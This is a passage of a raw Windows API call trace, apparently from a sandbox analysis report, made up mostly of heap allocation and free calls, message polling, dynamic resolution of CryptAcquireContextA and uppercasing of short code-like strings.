hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.569] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.569] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0165.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.570] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.572] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.573] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.573] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0165.573] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.573] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0165.573] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.573] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.574] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.574] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.574] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.574] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.574] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.574] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.574] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.574] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.574] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.575] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.575] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.575] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0165.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.576] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.576] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.576] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.577] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0165.577] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.577] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.577] RtlAllocateHeap (HeapHandle=0x25c0000, 